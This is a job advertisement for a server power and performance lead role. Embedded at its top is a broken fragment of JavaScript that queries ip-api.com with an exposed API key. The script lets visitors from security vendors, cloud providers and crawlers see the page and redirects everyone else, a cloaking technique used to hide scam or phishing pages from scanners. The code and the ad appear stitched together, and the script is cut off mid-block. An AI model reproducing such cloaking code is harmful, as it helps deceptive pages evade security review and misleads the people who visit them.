Server Product Power & Performance Lead
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a Server Product Power & Performance Lead located in Santa Clara, California, to drive innovation in server hardware performance and energy efficiency.
Responsibilities include:
- Leading the development and optimization of server power and performance features to meet market and customer needs.
- Collaborating with cross-functional teams to define product specifications, benchmarks, and testing protocols.
- Analyzing performance data to identify areas for improvement and implementing solutions to enhance efficiency and scalability.
- Driving research on emerging technologies and industry trends related to power management and performance tuning.
- Providing technical leadership and mentorship to engineering teams.
Skills needed:
- Strong background in hardware architecture, power management, and performance optimization.
- Proficiency in performance analysis tools and methodologies.
- Excellent problem-solving, communication, and collaboration skills.
Benefits include competitive salary, comprehensive health coverage, flexible work arrangements, professional development opportunities, and a dynamic, innovative work environment.